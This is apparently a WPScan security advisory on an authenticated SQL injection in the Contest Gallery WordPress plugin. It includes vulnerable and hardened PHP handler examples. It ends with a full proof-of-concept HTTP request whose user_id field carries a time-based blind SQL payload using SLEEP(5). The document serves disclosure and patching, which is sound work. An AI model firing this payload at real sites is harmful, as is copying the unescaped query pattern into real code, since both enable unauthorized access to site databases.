Source: wpvulndb (WPScan)
Author: Daniel Krohmer
WPVDB-ID: 254F6E8B-5FA9-4D6D-8E0E-1A4CAE18AEE0
Published: Dec 05, 2022

Contest Gallery < 19.1.5.1 - Author+ SQL Injection

Source: wpscan.com
Tags: contest gallery plugin, sql injection, sensitive information, author privilege, unauthorized access

EPSS: 0.002 (percentile 60.0%)

The plugin does not escape the user_id POST parameter before concatenating it into an SQL query in ajax-functions-backend.php, which is reached through the admin-ajax action post_cg_backend_image_upload. A logged-in user with at least the Author role can therefore inject into that query. The PoC below uses a time-based blind payload (SLEEP(5)): a vulnerable site answers roughly five seconds later than it does for a plain user_id=3, and the same technique can be extended to extract sensitive information from the site's database. Fixed in version 19.1.5.1.
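The page does not show the plugin's source, so the following is an added illustration rather than the plugin's own code: a hypothetical reconstruction of the query pattern the advisory describes (a POST value interpolated unescaped into a $wpdb query inside an admin-ajax handler) next to a hardened handler using $wpdb->prepare(). The table name, nonce action, hook name and function names are assumptions chosen not to collide with the real plugin; $wpdb, check_ajax_referer(), absint(), current_user_can() and wp_send_json_*() are standard WordPress APIs.

```php
<?php
// Added example, not Contest Gallery's code. Table name, nonce action and hook
// name are hypothetical; the WordPress functions used are the real core APIs.

// VULNERABLE pattern: $_POST['user_id'] is dropped into the SQL string as-is, so a
// value such as "3 AND (SELECT 6037 FROM (SELECT(SLEEP(5)))Uiuu)" becomes part of
// the WHERE clause and MySQL evaluates the attacker's subquery.
function cg_example_vulnerable_handler() {
    global $wpdb;
    $user_id = $_POST['user_id'];                    // attacker-controlled string
    $table   = $wpdb->prefix . 'cg_example_images';  // hypothetical table name
    $sql     = "SELECT id, file_name FROM {$table} WHERE user_id = {$user_id}";
    $rows    = $wpdb->get_results( $sql, ARRAY_A );
    wp_send_json_success( $rows );
}

// HARDENED pattern: nonce check, integer coercion, authorization, prepared statement.
function cg_example_hardened_handler() {
    global $wpdb;

    // Reject requests that do not carry a valid nonce for this action
    // (hypothetical nonce action name; dies with 403 on failure).
    check_ajax_referer( 'cg_example_image_upload', '_wpnonce' );

    // absint() keeps only the leading integer: "3 AND (SELECT ...)" becomes 3,
    // so the injected tail never reaches the query.
    $user_id = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;

    // Authorization: an Author may only query their own rows unless they are an admin.
    if ( $user_id !== get_current_user_id() && ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $table = $wpdb->prefix . 'cg_example_images';
    // %d makes prepare() emit an integer literal; the raw POST value is never
    // concatenated into the SQL text.
    $sql  = $wpdb->prepare( "SELECT id, file_name FROM {$table} WHERE user_id = %d", $user_id );
    $rows = $wpdb->get_results( $sql, ARRAY_A );
    wp_send_json_success( $rows );
}

// Hypothetical hook name so this does not shadow the plugin's real action.
add_action( 'wp_ajax_cg_example_image_upload', 'cg_example_hardened_handler' );
```

To verify a fix of this kind, send the request twice from an Author session, once with user_id=3 and once with the SLEEP(5) payload from the PoC, and compare response latency: on the vulnerable handler the second request takes about five seconds longer, on the hardened one both return promptly because the value is reduced to the integer 3 before it is bound.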

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/profile.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------5167035403431582548369588705
Content-Length: 2816
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=test1%7C1668471291%7C7VPhYIeBdCjIP9uW8VoyQrGPufCvPRRf5M9OXWus6HS%7C92b6fd388ba13304a4e6d05bb993994b73e939c69f835a5f48832fd667db6a41; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=test1%7C1668471291%7C7VPhYIeBdCjIP9uW8VoyQrGPufCvPRRf5M9OXWus6HS%7C4a47ea962cf6ef424f4c85c035f566bcefb106dac5c9061bff96ab380af53d60; wp-settings-time-3=1668298491
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="_wpnonce"

5c8402bea9
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_input_image_upload_file_to_delete_wp_id"

1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/profile.php
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="from"

profile
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="checkuser_id"

3
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="color-nonce"

6f0655e068
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="admin_color"

fresh
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="admin_bar_front"

1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="first_name"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="last_name"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="nickname"

test1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="display_name"

test1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="url"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="description"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="pass1"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="pass2"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_user_data_available"

true
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_user_id"

3
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="action"

post_cg_backend_image_upload
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_input_image_upload_file[]"; filename="index.png"
Content-Type: text/plain

TEST
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="user_id"

3 AND (SELECT 6037 FROM (SELECT(SLEEP(5)))Uiuu)
-----------------------------5167035403431582548369588705--
